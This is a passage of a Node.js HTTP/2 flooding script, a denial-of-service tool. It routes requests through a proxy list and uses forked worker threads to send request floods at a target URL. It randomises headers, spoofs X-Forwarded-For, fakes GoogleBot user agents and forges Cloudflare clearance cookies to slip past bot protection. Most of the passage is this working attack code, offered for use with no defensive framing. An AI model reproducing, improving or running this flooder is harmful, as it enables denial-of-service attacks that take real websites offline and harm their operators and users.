    'question',
    'answers',
    'support',
    'login',
    'register',
    'profile',
    'account',
    'settings',
    'admin',
    'management',
    'dashboard',
    'panel',
    'control',
    'help',
    'about',
    'terms',
    'privacy',
    'faq',
    'contact',
    'terms-of-service',
    'cookie-policy',
    'data-policy',
    'cookie',
    'user',
    'company',
    'product',
    'shop',
    'store',
    'checkout',
    'cart',
    'purchase',
    'order',
    'shipment',
    'review',
    'rating',
    'feedback',
    'wishlist',
    'coupon',
    'discount',
    'promotion',
    'offer',
    'bargain',
    'sale',
    'discounted',
    'clearance',
    'hot-deal',
    'premium',
    'exclusive',
    'special-offer',
    'limited-time',
    'hot',
    'trending',
    'viral',
    'top-rated',
    'recommended',
    'new-arrivals',
    'best-sellers',
    'deal-of-the-day',
    'flash-sale',
    'limited-edition',
    'feature',
    'update',
    'newsletters',
    'newsletter',
    'events',
    'offers',
    'affiliate',
    'partners',
    'dealers',
    'agents',
    'distributors',
    'resellers',
    'network',
    'marketplace',
    'community',
    'membership',
    'loyalty',
    'rewards',
    'customer',
    'client',
    'buyer',
    'seller',
    'service-provider',
    'agency',
    'brand',
    'merchandise',
    'stock',
    'inventory',
    'supply-chain',
    'manufacturing',
    'wholesale',
    'retail',
    'business',
    'corporate',
    'enterprise',
    'industry',
    'consulting',
    'outsourcing',
    'technology',
    'software',
    'hardware',
    'cloud',
    'web',
    'mobile',
    'AI',
    'blockchain',
    'big-data',
    'iot',
    'cybersecurity',
    'fintech',
    'edtech',
    'healthcare',
    'education',
    'real-estate',
    'law',
    'construction',
    'transportation',
    'logistics',
    'supply-chain',
    'energy',
    'renewable-energy',
    'automotive',
    'food',
    'beverage',
    'fashion',
    'lifestyle',
    'beauty',
    'cosmetics',
    'travel',
    'tourism',
    'hospitality',
    'events',
    'sports',
    'fitness',
    'media',
    'entertainment',
    'art',
    'design',
    'photography',
    'film',
    'music',
    'gaming',
    'technology-news',
    'health-news',
    'finance-news',
    'business-news',
    'education-news',
    'world-news',
    'local-news',
    'press-release',
    'announcements',
    'updates',
    'alerts',
    'notices',
    'reviews',
    'opinions',
    'insights',
    'thought-leadership',
    'whitepapers',
    'case-studies',
    'reports',
    'surveys',
    'research',
    'market-research',
    'benchmarking',
    'trends',
    'forecast',
    'analysis',
    'calculators',
    'tools',
    'widgets',
    'templates',
    'guides',
    'tutorials',
    'webinars',
    'online-courses',
    'training',
    'certifications',
    'support-tickets',
    'helpdesk',
    'service-desk',
    'incident-reporting',
    'solutions',
    'integrations',
    'support-forums',
    'knowledge-base',
    'community-forums',
    'product-docs',
    'api-docs',
    'developer-docs',
    'SDKs',
    'libraries',
    'samples',
    'references',
    'plugins',
    'add-ons',
    'extensions',
    'themes',
    'customization',
    'personalization',
    'automation',
    'dashboards',
    'analytics',
    'reports',
    'KPIs',
    'metrics',
    'performance',
    'uptime',
    'availability',
    'sla',
    'incident-response',
    'change-management',
    'configuration-management',
    'release-management',
    'version-control',
    'source-control',
    'deployment',
    'git',
    'ci-cd',
    'monitoring',
    'alerts',
    'logs',
    'metrics',
    'error-tracking',
    'logs',
    'tracing',
    'debugging',
    'optimization',
    'scalability',
    'load-balancing',
    'auto-scaling',
    'content-delivery',
    'caching',
    'compression',
    'cdn',
    'backups',
    'disaster-recovery',
    'high-availability',
    'clustering',
    'replication',
    'security',
    'encryption',
    'auth',
    'identity-management',
    'access-control',
    'multi-factor-authentication',
    'single-sign-on',
    'token-authentication',
    'jwt',
    'oauth',
    'saml',
    'api-security',
    'data-privacy',
    'gdpr',
    'ccpa',
    'hipaa',
    'pci-dss',
    'iso-27001',
    'security-compliance',
    'risk-management',
    'incident-response',
    'vulnerability-management',
    'patch-management',
    'security-operations',
    'threat-intelligence',
    'penetration-testing',
    'bug-bounty',
    'firewall',
    'intrusion-detection',
    'intrusion-prevention',
    'network-security',
    'web-application-firewall',
    'ddos-protection',
    'anti-virus',
    'anti-malware',
    'content-filtering',
    'proxy',
    'vpn',
    'secure-access',
    'security-auditing',
    'audit-trails',
    'incident-tracking',
    'compliance',
    'disaster-recovery',
    'business-continuity',
    'incident-management',
    'data-recovery',
    'ransomware-prevention',
    'password-management',
    'data-encryption',
    'backup-encryption',
    'data-loss-prevention'
];
  
mode = [
    'cors',
    'navigate',
    'no-cors',
    'same-origin',
    'default',
    'same-site',
    'cross-origin',
    'file',
    'inline',
    'strict-origin',
    'origin',
    'origin-when-cross-origin',
    'no-referrer',
    'no-referrer-when-downgrade',
    'unsafe-url',
    'block-all-mixed-content',
    'allow-all-mixed-content',
    'navigate-to',
    'navigate-from',
    'browser',
    'fetch',
    'service-worker',
    'iframe',
    'data',
    'window',
    'popup',
    'web-worker',
    'thread',
    'event-source',
    'geolocation',
    'ajax',
    'socket',
    'http',
    'https',
    'cross-origin-isolated',
    'feature-policy',
    'autoplay',
    'user-gesture',
    'non-secure',
    'secure',
    'experimental',
    'legacy',
    'advanced',
    'basic',
    'headless',
    'disabled',
    'enabled',
    'public',
    'private',
    'client-side',
    'server-side',
    'local',
    'remote',
    'mobile',
    'desktop',
    'tablet',
    'browser-side',
    'renderer-side',
    'proxy',
    'preload',
    'offline',
    'online',
    'production',
    'development',
    'test',
    'custom',
    'optimized',
    'secure-context',
    'managed',
    'unmanaged',
    'trusted',
    'untrusted',
    'readonly',
    'writeable',
    'temporary',
    'persistent',
    'short-lived',
    'long-lived',
    'external',
    'internal',
    'trusted-origin',
    'untrusted-origin',
    'empty',
    'dynamically-loaded',
    'statically-loaded',
    'restricted',
    'unrestricted',
    'integrity-checked',
    'no-integrity-check',
    'high-security',
    'medium-security',
    'low-security',
    'unsafe',
    'sandboxed',
    'non-sandboxed',
    'unblockable',
    'blockable',
    'incremental',
    'full',
    'partial',
    'response-timeout',
    'request-timeout',
    'session-storage',
    'local-storage',
    'cookie-based',
    'http-2',
    'http-1-1',
    'http-3',
    'fetch-intercept',
    'no-cache',
    'default-cache',
    'immutable-cache',
    'custom-cache',
    'post-request',
    'get-request',
    'put-request',
    'delete-request',
    'head-request',
    'options-request',
    'patch-request',
    'jsonp',
    'event-stream',
    'websocket',
    'long-polling',
    'short-polling',
    'ajax-request',
    'get-headers',
    'send-file',
    'web-socket',
    'ajax-polling',
    'slow-post',
    'fast-get',
    'chunked',
    'unchunked',
    'raw',
    'json',
    'form-data',
    'multipart',
    'xml',
    'text',
    'image',
    'audio',
    'video',
    'flash',
    'pdf',
    'jsonp',
    'jsonp-raw',
    'custom-http',
    'http-custom',
    'iframe-embedded',
    'cross-origin-embed',
    'simple-fetch',
    'fetch-wrapper',
    'browser-fetch',
    'custom-header',
    'same-origin-iframe',
    'same-site-fetch',
    'preload-embed',
    'sandboxed-iframe',
    'cross-origin-fetch',
    'insecure',
    'secure-origin',
    'local-server',
    'client-server',
    'http-method',
    'content-negotiation',
    'media-queries',
    'media-type',
    'content-encoding',
    'accept-language',
    'content-disposition',
    'content-length',
    'authorization',
    'client-cookie',
    'server-cookie',
    'authorization-token',
    'authentication',
    'pre-flight',
    'allow-cross-origin',
    'allowed-methods',
    'cross-origin-policy',
    'multi-source',
    'single-source',
    'mixed-content',
    'strict-transport-security',
    'hsts',
    'cookie-policy',
    'same-origin-policy',
    'cross-origin-request',
    'jsonp-request',
    'content-security-policy',
    'cors-policy',
    'referrer-policy',
    'ssl-pinning',
    'strict-origin-policy',
    'allow-all-origin',
    'no-origin',
    'unload',
    'load',
    'service-worker-mode',
    'worker-mode',
    'manual',
    'auto',
    'auto-reload',
    'reload',
    'redirect',
    'follow-redirect',
    'cancel',
    'retry',
    'staging',
    'production-ready',
    'experimental-feature',
    'web-audio',
    'webgl',
    'canvas',
    'page-load',
    'network-sync',
    'network-async',
    'network-optim',
    'force-https',
    'header-policy',
    'allow-untrusted-origin',
    'open-url',
    'close-url'
];
  
dest = [
    'document',
    'image',
    'embed',
    'empty',
    'frame',
    'audio',
    'video',
    'script',
    'style',
    'iframe',
    'object',
    'font',
    'manifest',
    'worker',
    'sharedworker',
    'serviceworker',
    'websocket',
    'ajax',
    'fetch',
    'xhr',
    'css',
    'json',
    'html',
    'xml',
    'plain-text',
    'text-plain',
    'pdf',
    'application/pdf',
    'manifest-link',
    'prefetch',
    'prerender',
    'frame-subresource',
    'api-call',
    'graphql',
    'rest-api',
    'soap-api',
    'websocket-connection',
    'media-stream',
    'video-stream',
    'audio-stream',
    'font-face',
    'font-woff',
    'font-woff2',
    'font-eot',
    'font-ttf',
    'image-webp',
    'image-jpeg',
    'image-png',
    'image-gif',
    'image-svg+xml',
    'image-bmp',
    'image-tiff',
    'image-heif',
    'image-avif',
    'image-x-icon',
    'application/json',
    'application/xml',
    'application/javascript',
    'application/x-www-form-urlencoded',
    'application/zip',
    'application/x-zip-compressed',
    'application/x-gzip',
    'application/x-tar',
    'application/octet-stream',
    'application/x-msdownload',
    'application/vnd.ms-excel',
    'application/msword',
    'application/x-shockwave-flash',
    'application/pdf',
    'application/xml+json',
    'application/xml+html',
    'application/xhtml+xml',
    'application/x-httpd-php',
    'text/html',
    'text/css',
    'text/javascript',
    'text/xml',
    'text/plain',
    'text/csv',
    'text/tab-separated-values',
    'text/markdown',
    'text/x-python',
    'text/x-sh',
    'text/x-c',
    'text/x-c++',
    'text/x-java',
    'text/x-perl',
    'text/x-ruby',
    'text/x-php',
    'text/x-haskell',
    'text/x-makefile',
    'text/x-yaml',
    'text/x-rust',
    'text/x-go',
    'text/x-sql',
    'text/x-dockerfile',
    'image/jpeg',
    'image/png',
    'image/gif',
    'image/svg+xml',
    'image/webp',
    'image/tiff',
    'image/bmp',
    'image/x-icon',
    'video/mp4',
    'video/ogg',
    'video/webm',
    'audio/mp3',
    'audio/ogg',
    'audio/wav',
    'audio/mpeg',
    'audio/aac',
    'audio/flac',
    'audio/webm',
    'application/zip',
    'application/gzip',
    'application/x-rar-compressed',
    'application/x-7z-compressed',
    'application/x-bzip2',
    'application/x-xz',
    'application/msword',
    'application/vnd.ms-excel',
    'application/vnd.ms-powerpoint',
    'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
    'application/vnd.openxmlformats-officedocument.presentationml.presentation',
    'application/x-httpd-php',
    'application/javascript',
    'application/json',
    'application/xml',
    'application/xhtml+xml',
    'application/x-www-form-urlencoded',
    'application/x-json',
    'application/yaml',
    'application/vnd.api+json',
    'application/hal+json',
    'application/problem+json',
    'application/ld+json',
    'application/xml+json',
    'application/soap+xml',
    'application/rdf+xml',
    'application/x-sql',
    'application/xml-dtd',
    'application/x-msdownload',
    'application/x-xpinstall',
    'application/java-archive',
    'application/x-java-jnlp-file',
    'application/x-mspublisher',
    'application/x-msi',
    'application/x-wine-extension',
    'application/vnd.ms-outlook',
    'application/msword',
    'application/vnd.ms-excel',
    'application/vnd.ms-powerpoint',
    'application/mbox',
    'application/x-gzip',
    'application/x-bzip2',
    'application/x-xz',
    'application/x-tar',
    'application/x-7z-compressed',
    'application/gzip',
    'application/x-rar',
    'application/x-tar',
    'application/x-iso9660-image',
    'application/x-zip-compressed',
    'application/x-msdownload',
    'application/x-rtf',
    'application/msword',
    'application/x-msdownload',
    'text/javascript',
    'text/xml',
    'text/plain',
    'text/css',
    'text/html',
    'text/plain',
    'text/csv',
    'text/tab-separated-values',
    'text/markdown',
    'text/x-python',
    'text/x-sh',
    'text/x-c',
    'text/x-c++',
    'text/x-java',
    'text/x-perl',
    'text/x-ruby',
    'text/x-php',
    'text/x-haskell',
    'text/x-makefile',
    'text/x-yaml',
    'text/x-rust',
    'text/x-go',
    'text/x-sql',
    'text/x-dockerfile'
];
  
const rateHeaders = [
{ "akamai-origin-hop": randstr(5)  },
{ "source-ip": randstr(5)  },
{ "via": randstr(5)  },
{ "cluster-ip": randstr(5)  },
];
const rateHeaders2 = [
{ "akamai-origin-hop": randstr(5)  },
{ "source-ip": randstr(5)  },
{ "via": randstr(5)  },
{ "cluster-ip": randstr(5)  },
];

const useragentl = [
 '(CheckSecurity 2_0)',
 '(BraveBrowser 5_0)',
 '(ChromeBrowser 3_0)',
 '(ChromiumBrowser 4_0)',
 '(AtakeBrowser 2_0)',
 '(NasaChecker)',
 '(CloudFlareIUAM)',
 '(NginxChecker)',
 '(AAPanel)',
 '(AntiLua)',
 '(FushLua)',
 '(FBIScan)',
 '(FirefoxTop)',
 '(ChinaNet Bot)'
];

const mozilla = [
 'Mozilla/5.0 ',
 'Mozilla/6.0 ',
 'Mozilla/7.0 ',
 'Mozilla/8.0 ',
 'Mozilla/9.0 '
];

 var cipper = cplist[Math.floor(Math.floor(Math.random() * cplist.length))];
 var siga = sig[Math.floor(Math.floor(Math.random() * sig.length))];
 var uap1 = uap[Math.floor(Math.floor(Math.random() * uap.length))];
 var ver = version[Math.floor(Math.floor(Math.random() * version.length))];
 var az1 = useragentl[Math.floor(Math.floor(Math.random() * useragentl.length))];
 var platforms = platform[Math.floor(Math.floor(Math.random() * platform.length))];
 var Ref = refers[Math.floor(Math.floor(Math.random() * refers.length))];
 var site1 = site[Math.floor(Math.floor(Math.random() * site.length))];
 var moz = mozilla[Math.floor(Math.floor(Math.random() * mozilla.length))];
 var mode1 = mode[Math.floor(Math.floor(Math.random() * mode.length))];
 var dest1 = dest[Math.floor(Math.floor(Math.random() * dest.length))];
 var accept = accept_header[Math.floor(Math.floor(Math.random() * accept_header.length))];
 var lang = lang_header[Math.floor(Math.floor(Math.random() * lang_header.length))];
 var encoding = encoding_header[Math.floor(Math.floor(Math.random() * encoding_header.length))];
 var control = control_header[Math.floor(Math.floor(Math.random() * control_header.length))];
 var proxies = readLines(args.proxyFile);
 const parsedTarget = url.parse(args.target);

  if (cluster.isMaster) {
    for (let counter = 1; counter <= args.threads; counter++) {
        cluster.fork();
    }
} else {setInterval(runFlooder) }
 
 class NetSocket {
     constructor(){}
 
  HTTP(options, callback) {
     const parsedAddr = options.address.split(":");
     const addrHost = parsedAddr[0];
     const payload = "CONNECT " + options.address + ":443 HTTP/1.1\r\nHost: " + options.address + ":443\r\nConnection: Keep-Alive\r\n\r\n";
     const buffer = new Buffer.from(payload);
 
     const connection = net.connect({
         host: options.host,
         port: options.port
     });
 
     //connection.setTimeout(options.timeout * 600000);
     connection.setTimeout(options.timeout * 100000);
     connection.setKeepAlive(true, 100000);
 
     connection.on("connect", () => {
         connection.write(buffer);
     });
 
     connection.on("data", chunk => {
         const response = chunk.toString("utf-8");
         const isAlive = response.includes("HTTP/1.1 200");
         if (isAlive === false) {
             connection.destroy();
             return callback(undefined, "error: invalid response from proxy server");
         }
         return callback(connection, undefined);
     });
 
     connection.on("timeout", () => {
         connection.destroy();
         return callback(undefined, "error: timeout exceeded");
     });
 
     connection.on("error", error => {
         connection.destroy();
         return callback(undefined, "error: " + error);
     });
 }
 }

 const Socker = new NetSocket();
 headers[":method"] = "GET";
 headers[":authority"] = parsedTarget.host;
 headers[":path"] = parsedTarget.path + "?" + randstr(5) + "=" + randstr(15);
 headers[":scheme"] = "https";
 headers["x-forwarded-proto"] = "https";
 headers["cache-control"] = "no-cache";
 headers["X-Forwarded-For"] = spoofed;
 headers["sec-ch-ua"] = '"Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"';
 headers["sec-ch-ua-mobile"] = "?0";
 headers["sec-ch-ua-platform"] = "Windows";
 headers["accept-language"] = lang;
 headers["accept-encoding"] = encoding;
 headers["upgrade-insecure-requests"] = "1";
 headers["accept"] = accept;
 headers["user-agent"] = moz + az1 + "-(GoogleBot + http://www.google.com)" + " Code:" + randstr(7);
 headers["referer"] = Ref;
 headers["sec-fetch-mode"] = "navigate";
 headers["sec-fetch-dest"] = dest1;
 headers["sec-fetch-user"] = "?1";
 headers["TE"] = "trailers";
 headers["cookie"] = "cf_clearance=" + randstr(4) + "." + randstr(20) + "." + randstr(40) + "-0.0.1 " + randstr(20) + ";_ga=" + randstr(20) + ";_gid=" + randstr(15);
 headers["sec-fetch-site"] = site1;
 headers["x-requested-with"] = "XMLHttpRequest";
 
 function runFlooder() {
     const proxyAddr = randomElement(proxies);
     const parsedProxy = proxyAddr.split(":"); 
         headers["origin"] = "https://" + parsedTarget.host;

     const proxyOptions = {
         host: parsedProxy[0],
         port: ~~parsedProxy[1],
         address: parsedTarget.host + ":443",
         timeout: 300,
     };

     Socker.HTTP(proxyOptions, (connection, error) => {
         if (error) return
 
         connection.setKeepAlive(true, 200000);

         const tlsOptions = {
            secure: true,
            ALPNProtocols: ['h2'],
            //ALPNProtocols: ['h2','http/1.1','spdy/3.1'],
            sigals: siga,
            socket: connection,
            ciphers: cipper,
            ecdhCurve: "prime256v1:X25519",
            host: parsedTarget.host,
            rejectUnauthorized: false,
            servername: parsedTarget.host,
            //secureProtocol: "TLS_method",
            secureProtocol: ["TLSv1_1_method", "TLS_method","TLSv1_2_method", "TLSv1_3_method",],
        };

         const tlsConn = tls.connect(443, parsedTarget.host, tlsOptions); 

         tlsConn.setKeepAlive(true, 60000);

         const client = http2.connect(parsedTarget.href, {
             protocol: "https:",
             settings: {
            headerTableSize: 65536,
            maxConcurrentStreams: 10000,
            initialWindowSize: 6291456,
            maxHeaderListSize: 65536,
            enablePush: false
          },
             maxSessionMemory: 64000,
             maxDeflateDynamicTableSize: 4294967295,
             createConnection: () => tlsConn,
             socket: connection,
         });
 
         client.settings({
            headerTableSize: 65536,
            maxConcurrentStreams: 10000,
            initialWindowSize: 6291456,
            maxHeaderListSize: 65536,
            enablePush: false
          });

     setInterval(() => {
         client.on("connect", () => {
              const dynHeaders = {
                ...headers,
                ...rateHeaders2[Math.floor(Math.random()*rateHeaders.length)],
                ...rateHeaders[Math.floor(Math.random()*rateHeaders.length)]
              };
                for (let i = 0; i < args.Rate; i++) {
                    const request = client.request(dynHeaders)
                    
                    request.on("response", response => {
                        //console.log("Response:", response);
                        request.close();
                        request.destroy();
                        return
                    });
    
                    request.end();
                }
            }); 
         });
 
         client.on("close", () => {
             client.destroy();
             connection.destroy();
             return
         });
     }),function (error, response, body) {
		};
 }
 
 const KillScript = () => process.exit(1);
 
 setTimeout(KillScript, args.time * 1000);